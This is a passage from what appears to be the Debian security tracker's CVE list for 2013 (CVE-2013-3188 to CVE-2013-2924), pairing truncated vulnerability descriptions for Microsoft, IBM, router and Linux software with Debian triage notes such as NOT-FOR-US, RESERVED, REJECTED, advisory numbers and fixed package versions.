	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-3188 (Microsoft Internet Explorer 8 and 9 allows remote attackers to execute ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-3187 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-3186 (The Protected Mode feature in Microsoft Internet Explorer 7 through 10 ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-3185 (Microsoft Active Directory Federation Services (AD FS) 1.x through 2.1 ...)
	NOT-FOR-US: Microsoft Active Directory Federation Services
CVE-2013-3184 (Microsoft Internet Explorer 7 through 10 allows remote attackers to ex ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-3183 (The TCP/IP implementation in Microsoft Windows Vista SP2, Windows Serv ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-3182 (The Windows NAT Driver (aka winnat) service in Microsoft Windows Serve ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-3181 (usp10.dll in the Unicode Scripts Processor in Microsoft Windows XP SP2 ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-3180 (Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Serve ...)
	NOT-FOR-US: Microsoft SharePoint Server
CVE-2013-3179 (Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Serve ...)
	NOT-FOR-US: Microsoft SharePoint Server
CVE-2013-3178 (Microsoft Silverlight 5 before 5.1.20513.0 does not properly initializ ...)
	NOT-FOR-US: Microsoft Silverlight
CVE-2013-3177
	REJECTED
CVE-2013-3176
	REJECTED
CVE-2013-3175 (Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vis ...)
	NOT-FOR-US: Microsoft
CVE-2013-3174 (DirectShow in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP ...)
	NOT-FOR-US: Microsoft
CVE-2013-3173 (Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft
CVE-2013-3172 (Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft
CVE-2013-3171 (The serialization functionality in Microsoft .NET Framework 2.0 SP2, 3 ...)
	NOT-FOR-US: Microsoft
CVE-2013-3170
	REJECTED
CVE-2013-3169
	REJECTED
CVE-2013-3168
	REJECTED
CVE-2013-3167 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...)
	NOT-FOR-US: Microsoft
CVE-2013-3166 (Cross-site scripting (XSS) vulnerability in Microsoft Internet Explore ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-3165
	REJECTED
CVE-2013-3164 (Microsoft Internet Explorer 8 allows remote attackers to execute arbit ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-3163 (Microsoft Internet Explorer 8 through 10 allows remote attackers to ex ...)
NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3162 (Microsoft Internet Explorer 7 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3161 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3160 (Microsoft Office 2003 SP3 and 2007 SP3, Word 2003 SP3 and 2007 SP3, an ...) NOT-FOR-US: Microsoft Office CVE-2013-3159 (Microsoft Excel 2003 SP3, 2007 SP3, and 2010 SP1 and SP2; Excel Viewer ...) NOT-FOR-US: Microsoft Excel CVE-2013-3158 (Microsoft Excel 2003 SP3 and 2007 SP3 allows remote attackers to execu ...) NOT-FOR-US: Microsoft Excel CVE-2013-3157 (Microsoft Access 2007 SP3, 2010 SP1 and SP2, and 2013 in Microsoft Off ...) NOT-FOR-US: Microsoft CVE-2013-3156 (Microsoft Access 2007 SP3, 2010 SP1 and SP2, and 2013 in Microsoft Off ...) NOT-FOR-US: Microsoft Access CVE-2013-3155 (Microsoft Access 2007 SP3, 2010 SP1 and SP2, and 2013 in Microsoft Off ...) NOT-FOR-US: Microsoft CVE-2013-3154 (The signature-update functionality in Windows Defender on Microsoft Wi ...) NOT-FOR-US: Microsoft Windows CVE-2013-3153 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3152 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3151 (Microsoft Internet Explorer 8 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3150 (Microsoft Internet Explorer 9 allows remote attackers to execute arbit ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3149 (Microsoft Internet Explorer 7 and 8 allows remote attackers to execute ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3148 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...) 
NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3147 (Microsoft Internet Explorer 6 through 9 allows remote attackers to exe ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3146 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3145 (Microsoft Internet Explorer 9 allows remote attackers to execute arbit ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3144 (Microsoft Internet Explorer 8 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3143 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3142 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3141 (Microsoft Internet Explorer 8 and 9 allows remote attackers to execute ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3140 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows r ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3139 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3138 (Integer overflow in the TCP/IP kernel-mode driver in Microsoft Windows ...) NOT-FOR-US: Microsoft CVE-2013-3137 (Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allow ...) NOT-FOR-US: Microsoft FrontPage CVE-2013-3136 (The kernel in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windo ...) NOT-FOR-US: Microsoft CVE-2013-3135 REJECTED CVE-2013-3134 (The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP2, ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-3133 (Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not prop ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-3132 (Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, and ...) 
NOT-FOR-US: Microsoft .NET Framework CVE-2013-3131 (Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5, and Silverli ...) NOT-FOR-US: Microsoft CVE-2013-3130 REJECTED CVE-2013-3129 (Microsoft .NET Framework 3.0 SP2, 3.5, 3.5.1, 4, and 4.5; Silverlight ...) NOT-FOR-US: Microsoft CVE-2013-3128 (The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows S ...) NOT-FOR-US: Microsoft Windows CVE-2013-3127 (The Microsoft WMV video codec in wmv9vcm.dll, wmvdmod.dll in Windows M ...) NOT-FOR-US: Microsoft CVE-2013-3126 (Microsoft Internet Explorer 9 and 10, when script debugging is enabled ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3125 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3124 (Microsoft Internet Explorer 9 allows remote attackers to execute arbit ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3123 (Microsoft Internet Explorer 8 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3122 (Microsoft Internet Explorer 9 allows remote attackers to execute arbit ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3121 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3120 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3119 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3118 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3117 (Microsoft Internet Explorer 9 allows remote attackers to execute arbit ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3116 (Microsoft Internet Explorer 7 through 9 allows remote attackers to exe ...) 
NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3115 (Microsoft Internet Explorer 7 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3114 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3113 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3112 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3111 (Microsoft Internet Explorer 8 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3110 (Microsoft Internet Explorer 8 and 9 allows remote attackers to execute ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3109 RESERVED CVE-2013-3108 RESERVED CVE-2013-3107 (VMware vCenter Server 5.1 before Update 1, when anonymous LDAP binding ...) NOT-FOR-US: vCenter CVE-2013-3106 (Multiple cross-site scripting (XSS) vulnerabilities in Open-Xchange Ap ...) NOT-FOR-US: Open-Xchange CVE-2013-3105 RESERVED CVE-2013-3104 RESERVED CVE-2013-3103 RESERVED CVE-2013-3102 RESERVED CVE-2013-3101 RESERVED CVE-2013-3100 RESERVED CVE-2013-3099 RESERVED CVE-2013-3098 (Multiple cross-site request forgery (CSRF) vulnerabilities in TRENDnet ...) NOT-FOR-US: TRENDnet TEW-812DRU router CVE-2013-3097 (Unspecified Cross-site scripting (XSS) vulnerability in the Verizon FI ...) NOT-FOR-US: Verizon CVE-2013-3096 (D-Link DIR865L v1.03 suffers from an "Unauthenticated Hardware Linking ...) NOT-FOR-US: D-Link CVE-2013-3095 (Multiple cross-site request forgery (CSRF) vulnerabilities in D-Link D ...) NOT-FOR-US: D-Link CVE-2013-3094 RESERVED CVE-2013-3093 (ASUS RT-N56U devices allow CSRF. ...) NOT-FOR-US: ASUS RT-N56U devices CVE-2013-3092 (The Belkin N300 (F7D7301v1) router allows remote attackers to bypass a ...) 
NOT-FOR-US: Belkin router CVE-2013-3091 (An Authentication Bypass vulnerability in Belkin N300 (F7D7301v1) rout ...) NOT-FOR-US: Belkin N300 router CVE-2013-3090 (Multiple cross-site scripting (XSS) vulnerabilities in Belkin N300 rou ...) NOT-FOR-US: Belkin N300 router CVE-2013-3089 (Cross-site request forgery (CSRF) vulnerability in apply.cgi in Belkin ...) NOT-FOR-US: Belkin N300 CVE-2013-3088 (Belkin N900 router (F9K1104v1) contains an Authentication Bypass using ...) NOT-FOR-US: Belkin N900 router CVE-2013-3087 (Multiple cross-site scripting (XSS) vulnerabilities in Belkin N900 rou ...) NOT-FOR-US: Belkin N900 router CVE-2013-3086 (Cross-site request forgery (CSRF) vulnerability in util_system.html in ...) NOT-FOR-US: Belkin N900 CVE-2013-3085 (An authentication bypass exists in the web management interface in Bel ...) NOT-FOR-US: Belkin CVE-2013-3084 (Multiple cross-site scripting (XSS) vulnerabilities in Belkin Model F5 ...) NOT-FOR-US: Belkin router CVE-2013-3083 (Cross-site request forgery (CSRF) vulnerability in cgi-bin/system_sett ...) NOT-FOR-US: Belkin CVE-2013-3082 (Cross-site scripting (XSS) vulnerability in plugins/jojo_core/forgot_p ...) NOT-FOR-US: Jojo CMS CVE-2013-3081 (SQL injection vulnerability in the checkEmailFormat function in plugin ...) NOT-FOR-US: Jojo CMS CVE-2013-3080 (VMware vCenter Server Appliance (vCSA) 5.1 before Update 1 allows remo ...) NOT-FOR-US: vCenter CVE-2013-3079 (VMware vCenter Server Appliance (vCSA) 5.1 before Update 1 allows remo ...) NOT-FOR-US: vCenter CVE-2013-3078 RESERVED CVE-2013-3077 (Multiple integer overflows in the IP_MSFILTER and IPV6_MSFILTER featur ...) {DSA-2743-1} - kfreebsd-8 (bug #720470) [wheezy] - kfreebsd-8 8.3-6+deb7u1 [squeeze] - kfreebsd-8 (Unsupported in squeeze-lts) - kfreebsd-9 9.2~svn254368-2 (bug #720468) - kfreebsd-10 10.0~svn254663-1 (bug #720471) CVE-2013-3076 (The crypto API in the Linux kernel through 3.9-rc8 does not initialize ...) 
{DSA-2669-1} - linux 3.8.11-1 (low) - linux-2.6 (Vulnerable code not present) CVE-2013-3075 (Multiple buffer overflows in ActUWzd.dll 1.0.0.1 in Mitsubishi MX Comp ...) NOT-FOR-US: Mitsubishi MX Component 3 CVE-2013-3074 (NetGear WNDR4700 Media Server devices with firmware 1.0.0.34 allow rem ...) NOT-FOR-US: NetGear WNDR4700 Media Server devices CVE-2013-3073 (A Symlink Traversal vulnerability exists in NETGEAR Centria WNDR4700 F ...) NOT-FOR-US: NETGEAR CVE-2013-3072 (An Authentication Bypass vulnerability exists in NETGEAR Centria WNDR4 ...) NOT-FOR-US: NETGEAR CVE-2013-3071 (NETGEAR Centria WNDR4700 devices with firmware 1.0.0.34 allow authenti ...) NOT-FOR-US: NETGEAR Centria WNDR4700 devices CVE-2013-3070 (An Information Disclosure vulnerability exists in Netgear WNDR4700 run ...) NOT-FOR-US: NETGEAR CVE-2013-3069 (Multiple cross-site scripting (XSS) vulnerabilities in NETGEAR WNDR470 ...) NOT-FOR-US: NETGEAR devices CVE-2013-3068 (Cross-site request forgery (CSRF) vulnerability in apply.cgi in Linksy ...) NOT-FOR-US: Linksys CVE-2013-3067 (Linksys WRT310Nv2 2.0.0.1 is vulnerable to XSS. ...) NOT-FOR-US: Linksys CVE-2013-3066 (Linksys EA6500 with firmware 1.1.28.147876 does not properly restrict ...) NOT-FOR-US: Linksys CVE-2013-3065 (Cross-site scripting (XSS) vulnerability in the Parental Controls sect ...) NOT-FOR-US: Linksys CVE-2013-3064 (Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA ...) NOT-FOR-US: Linksys CVE-2013-3063 (SAP BASIS Communication Services 4.6B through 7.30 allows remote authe ...) NOT-FOR-US: SAP BASIS Communication Services CVE-2013-3062 (The CP_RC_TRANSACTION_CALL_BY_SET function in the Engineering Workbenc ...) NOT-FOR-US: SAP CVE-2013-3061 (The ISHMED-PATRED_TRANSACT_RFCCALL function in the IS-H Industry-Speci ...) NOT-FOR-US: SAP CVE-2013-3060 (The web console in Apache ActiveMQ before 5.8.0 does not require authe ...) 
- activemq (Web console not provided in Debian package, see #702670) CVE-2013-3059 (Cross-site scripting (XSS) vulnerability in the Voting plugin in Jooml ...) NOT-FOR-US: Joomla! CVE-2013-3058 (Cross-site scripting (XSS) vulnerability in Joomla! 2.5.x before 2.5.1 ...) NOT-FOR-US: Joomla! CVE-2013-3057 (Joomla! 2.5.x before 2.5.10 and 3.0.x before 3.0.4 allows remote authe ...) NOT-FOR-US: Joomla! CVE-2013-3056 (Joomla! 2.5.x before 2.5.10 and 3.0.x before 3.0.4 allows remote authe ...) NOT-FOR-US: Joomla! CVE-2013-3055 (Lexmark Markvision Enterprise before 1.8 provides a diagnostic interfa ...) NOT-FOR-US: Lexmark Markvision Enterprise CVE-2013-3054 RESERVED CVE-2013-3053 RESERVED CVE-2013-3052 RESERVED CVE-2013-3051 (The TrustZone kernel, when used in conjunction with a certain Motorola ...) NOT-FOR-US: TrustZone kernel CVE-2013-3050 (SQL injection vulnerability in ZAPms 1.41 and earlier allows remote at ...) NOT-FOR-US: ZAPms CVE-2013-3049 (IBM Maximo Asset Management 7.1 through 7.1.1.12 and 7.5 before 7.5.0. ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-3048 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Managemen ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-3047 (IBM Maximo Asset Management 7.1 before 7.1.1.12 and 7.5 before 7.5.0.5 ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-3046 (The Meeting Server in IBM Sametime 8.x through 8.5.2.1 and 9.x through ...) NOT-FOR-US: IBM Sametime CVE-2013-3045 (The Enterprise Meeting Server in IBM Lotus Sametime 8.5.2 and 8.5.2.1 ...) NOT-FOR-US: IBM CVE-2013-3044 (The Enterprise Meeting Server in IBM Lotus Sametime 8.5.2 and 8.5.2.1 ...) NOT-FOR-US: IBM CVE-2013-3043 (Directory traversal vulnerability in the client in IBM Rational Softwa ...) NOT-FOR-US: IBM CVE-2013-3042 (Directory traversal vulnerability in the server in IBM Rational Softwa ...) NOT-FOR-US: IBM CVE-2013-3041 (The Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 bef ...) 
NOT-FOR-US: IBM CVE-2013-3040 (IBM InfoSphere Information Server through 8.5 FP3, 8.7 through FP2, an ...) NOT-FOR-US: IBM InfoSphere Information Server CVE-2013-3039 (IBM Rational Requirements Composer before 4.0.4 does not properly perf ...) NOT-FOR-US: IBM Rational Requirements Composer CVE-2013-3038 (Unspecified vulnerability in IBM Rational Requirements Composer before ...) NOT-FOR-US: IBM Rational Requirements Composer CVE-2013-3037 (Unspecified vulnerability in IBM Rational Requirements Composer before ...) NOT-FOR-US: IBM Rational Requirements Composer CVE-2013-3036 (Open redirect vulnerability in IBM Rational Requirements Composer befo ...) NOT-FOR-US: IBM Rational Requirements Composer CVE-2013-3035 (The IPv6 implementation in the inet subsystem in IBM AIX 6.1 and 7.1, ...) NOT-FOR-US: IBM AIX CVE-2013-3034 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Information ...) NOT-FOR-US: IBM InfoSphere Information Server CVE-2013-3033 (SQL injection vulnerability in the server component in IBM Tivoli Remo ...) NOT-FOR-US: IBM Tivoli Remote Control CVE-2013-3032 (Cross-site scripting (XSS) vulnerability in the MIME e-mail functional ...) NOT-FOR-US: IBM Domino CVE-2013-3031 (A SQL stored procedure in the Universal Cache component in IBM solidDB ...) NOT-FOR-US: IBM CVE-2013-3030 (The servlet gateway in IBM Cognos Business Intelligence 8.4.1 before I ...) NOT-FOR-US: IBM CVE-2013-3029 (Cross-site request forgery (CSRF) vulnerability in the Administrative ...) NOT-FOR-US: IBM WebSphere CVE-2013-3028 (Multiple buffer overflows in mqm programs in IBM WebSphere MQ 7.0.x be ...) NOT-FOR-US: IBM WebSphere CVE-2013-3027 (Integer overflow in the DWA9W ActiveX control in iNotes in IBM Domino ...) NOT-FOR-US: IBM Domino CVE-2013-3026 (Buffer overflow in the Lotus Quickr for Domino ActiveX control in qp2. ...) NOT-FOR-US: Lotus Quickr for Domino ActiveX CVE-2013-3025 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Rational Fo ...) 
NOT-FOR-US: IBM CVE-2013-3024 (IBM WebSphere Application Server (WAS) 8.5 through 8.5.0.2 on UNIX all ...) NOT-FOR-US: IBM CVE-2013-3023 (IBM Tivoli Application Dependency Discovery Manager (TADDM) 7.1.2 and ...) NOT-FOR-US: IBM CVE-2013-3022 REJECTED CVE-2013-3021 RESERVED CVE-2013-3020 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...) NOT-FOR-US: IBM CVE-2013-3019 RESERVED CVE-2013-3018 (The AXIS webapp in deploy-tomcat/axis in IBM Tivoli Application Depend ...) NOT-FOR-US: IBM CVE-2013-3017 (IBM Tivoli Application Dependency Discovery Manager (TADDM) before 7.2 ...) NOT-FOR-US: IBM CVE-2013-3016 (IBM WebSphere Portal 6.1, 7.0, and 8.0 allows remote attackers to acce ...) NOT-FOR-US: IBM WebSphere CVE-2013-3015 RESERVED CVE-2013-3014 RESERVED CVE-2013-3013 RESERVED CVE-2013-3012 (Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM ...) NOT-FOR-US: IBM JDK CVE-2013-3011 (Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM ...) NOT-FOR-US: IBM JDK CVE-2013-3010 (Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM ...) NOT-FOR-US: IBM JDK CVE-2013-3009 (The com.ibm.CORBA.iiop.ClientDelegate class in IBM Java 1.4.2 before 1 ...) NOT-FOR-US: IBM JDK CVE-2013-3008 (Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM ...) NOT-FOR-US: IBM JDK CVE-2013-3007 (Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM ...) NOT-FOR-US: IBM JDK CVE-2013-3006 (Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM ...) NOT-FOR-US: IBM JDK CVE-2013-3005 (The TFTP client in IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02, ...) NOT-FOR-US: TFTP client in IBM AIX CVE-2013-3004 (Directory traversal vulnerability in BIRT-Report Viewer in IBM Tivoli ...) NOT-FOR-US: IBM Tivoli Application Dependency Discovery Manager CVE-2013-3003 (Unspecified vulnerability in SOAP Gateway in IBM IMS Enterprise Suite ...) 
NOT-FOR-US: IBM CVE-2013-3002 RESERVED CVE-2013-3001 (Directory traversal vulnerability in IBM InfoSphere Data Replication D ...) NOT-FOR-US: IBM CVE-2013-3000 (SQL injection vulnerability in IBM InfoSphere Data Replication Dashboa ...) NOT-FOR-US: IBM CVE-2013-2999 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Data Replic ...) NOT-FOR-US: IBM CVE-2013-2998 (frontcontroller.jsp in IBM Maximo Asset Management 7.x before 7.5.0.6 ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-2997 (IBM Security AppScan Enterprise before 8.7 does not invalidate the ses ...) NOT-FOR-US: IBM CVE-2013-2996 RESERVED CVE-2013-2995 RESERVED CVE-2013-2994 (IBM WebSphere Commerce 7.0 Feature Pack 4 and Feature Pack 5 incorrect ...) NOT-FOR-US: IBM CVE-2013-2993 (IBM WebSphere Commerce 6.x through 6.0.0.11 and 7.x through 7.0.0.7 do ...) NOT-FOR-US: IBM CVE-2013-2992 (The Search component in IBM WebSphere Commerce 7.0 FP4 through FP6, in ...) NOT-FOR-US: IBM CVE-2013-2991 REJECTED CVE-2013-2990 REJECTED CVE-2013-2989 (The file-copying functionality in IBM Sterling Connect:Direct 3.8.00, ...) NOT-FOR-US: IBM CVE-2013-2988 (Absolute path traversal vulnerability in the server in IBM Cognos Busi ...) NOT-FOR-US: IBM Cognos CVE-2013-2987 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...) NOT-FOR-US: IBM CVE-2013-2986 REJECTED CVE-2013-2985 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...) NOT-FOR-US: IBM CVE-2013-2984 (Directory traversal vulnerability in IBM Sterling B2B Integrator 5.1 a ...) NOT-FOR-US: IBM CVE-2013-2983 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling Fi ...) NOT-FOR-US: IBM CVE-2013-2982 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...) NOT-FOR-US: IBM CVE-2013-2981 (Directory traversal vulnerability in the Web Console in IBM Data Studi ...) NOT-FOR-US: IBM Data Studio CVE-2013-2980 (Cross-site request forgery (CSRF) vulnerability in the Web Console in ...) 
NOT-FOR-US: IBM Data Studio CVE-2013-2979 (Directory traversal vulnerability in IBM Optim Performance Manager 4.1 ...) NOT-FOR-US: IBM CVE-2013-2978 (Absolute path traversal vulnerability in the server in IBM Cognos Busi ...) NOT-FOR-US: IBM Cognos CVE-2013-2977 (Integer overflow in IBM Notes 8.5.x before 8.5.3 FP4 Interim Fix 1 and ...) NOT-FOR-US: IBM Notes CVE-2013-2976 (The Administrative console in IBM WebSphere Application Server (WAS) 6 ...) NOT-FOR-US: IBM CVE-2013-2975 RESERVED CVE-2013-2974 (The BIRT viewer in IBM Tivoli Application Dependency Discovery Manager ...) NOT-FOR-US: IBM Tivoli Application Dependency Discovery Manager CVE-2013-2973 REJECTED CVE-2013-2972 (IBM WebSphere Cast Iron 6.3 allows remote attackers to bypass intended ...) NOT-FOR-US: IBM CVE-2013-2971 REJECTED CVE-2013-2970 (Unspecified vulnerability in IBM QRadar Security Information and Event ...) NOT-FOR-US: IBM CVE-2013-2969 (Cross-site scripting (XSS) vulnerability in IBM Sterling Control Cente ...) NOT-FOR-US: IBM Sterling Control Center CVE-2013-2968 (An unspecified buffer-read method in IBM Sterling Control Center (SCC) ...) NOT-FOR-US: IBM Sterling Control Center CVE-2013-2967 (Cross-site scripting (XSS) vulnerability in the Administrative console ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-2966 RESERVED CVE-2013-2965 RESERVED CVE-2013-2964 (Buffer overflow in dsmtca in IBM Tivoli Storage Manager (TSM) through ...) NOT-FOR-US: IBM Tivoli Storage Manager CVE-2013-2963 RESERVED CVE-2013-2962 (Buffer overflow in the Launcher in IBM WebSphere Transformation Extend ...) NOT-FOR-US: IBM WebSphere Transformation Extender CVE-2013-2961 (The internal web server in the Basic Services component in IBM Tivoli ...) NOT-FOR-US: IBM Tivoli CVE-2013-2960 (Buffer overflow in KDSMAIN in the Basic Services component in IBM Tivo ...) NOT-FOR-US: IBM Tivoli CVE-2013-2959 (The Console in IBM InfoSphere Optim Data Growth for Oracle E-Business ...) 
NOT-FOR-US: IBM CVE-2013-2958 RESERVED CVE-2013-2957 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Optim Data ...) NOT-FOR-US: IBM CVE-2013-2956 (SQL injection vulnerability in the Console in IBM InfoSphere Optim Dat ...) NOT-FOR-US: IBM CVE-2013-2955 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Optim Data ...) NOT-FOR-US: IBM CVE-2013-2954 (The login page in the Console in IBM InfoSphere Optim Data Growth for ...) NOT-FOR-US: IBM CVE-2013-2953 (IBM InfoSphere Optim Data Growth for Oracle E-Business Suite 6.x, 7.x, ...) NOT-FOR-US: IBM CVE-2013-2952 RESERVED CVE-2013-2951 (IBM WebSphere Portal 7.0.0.x and 8.0.0.x write passwords to a trace fi ...) NOT-FOR-US: IBM CVE-2013-2950 (CRLF injection vulnerability in IBM WebSphere Portal 6.1.0.x before 6. ...) NOT-FOR-US: IBM WebSphere CVE-2013-2949 RESERVED CVE-2013-2948 RESERVED CVE-2013-2947 RESERVED CVE-2013-2946 RESERVED CVE-2013-2945 (SQL injection vulnerability in blogs/admin.php in b2evolution before 4 ...) NOT-FOR-US: b2evolution CVE-2013-2944 (strongSwan 4.3.5 through 5.0.3, when using the OpenSSL plugin for ECDS ...) {DSA-2665-1} - strongswan 4.6.4-7 CVE-2013-2943 RESERVED CVE-2013-2942 RESERVED CVE-2013-2941 RESERVED CVE-2013-2940 (Unspecified vulnerability in Citrix CloudPortal Services Manager (aka ...) NOT-FOR-US: Citrix CloudPortal Services Manager CVE-2013-2939 (Unspecified vulnerability in Citrix CloudPortal Services Manager (aka ...) NOT-FOR-US: Citrix CloudPortal Services Manager CVE-2013-2938 (Unspecified vulnerability in Citrix CloudPortal Services Manager (aka ...) NOT-FOR-US: Citrix CloudPortal Services Manager CVE-2013-2937 (Unspecified vulnerability in Citrix CloudPortal Services Manager (aka ...) NOT-FOR-US: Citrix CloudPortal Services Manager CVE-2013-2936 (Unspecified vulnerability in Citrix CloudPortal Services Manager (aka ...) NOT-FOR-US: Citrix CloudPortal Services Manager CVE-2013-2935 (Unspecified vulnerability in Citrix CloudPortal Services Manager (aka ...) 
NOT-FOR-US: Citrix CloudPortal Services Manager CVE-2013-2934 (Citrix CloudPortal Services Manager (aka Cortex) 10.0 before Cumulativ ...) NOT-FOR-US: Citrix CloudPortal Services Manager CVE-2013-2933 (Unspecified vulnerability in Citrix CloudPortal Services Manager (aka ...) NOT-FOR-US: Citrix CloudPortal Services Manager CVE-2013-2932 RESERVED CVE-2013-2931 (Multiple unspecified vulnerabilities in Google Chrome before 31.0.1650 ...) {DSA-2799-1} - chromium-browser 31.0.1650.57-1 [squeeze] - chromium-browser CVE-2013-2930 (The perf_trace_event_perm function in kernel/trace/trace_event_perf.c ...) - linux-2.6 (Introduced in v3.4) [wheezy] - linux (Introduced in v3.4) - linux 3.11.8-1 NOTE: Introduced by ced39002f5ea CVE-2013-2929 (The Linux kernel before 3.12.2 does not properly use the get_dumpable ...) {DSA-2906-1} - linux-2.6 - linux 3.11.10-1 [wheezy] - linux 3.2.53-2 CVE-2013-2928 (Multiple unspecified vulnerabilities in Google Chrome before 30.0.1599 ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2927 (Use-after-free vulnerability in the HTMLFormElement::prepareForSubmiss ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2926 (Use-after-free vulnerability in the IndentOutdentCommand::tryIndenting ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2925 (Use-after-free vulnerability in core/xml/XMLHttpRequest.cpp in Blink, ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2924 (Use-after-free vulnerability in International Components for 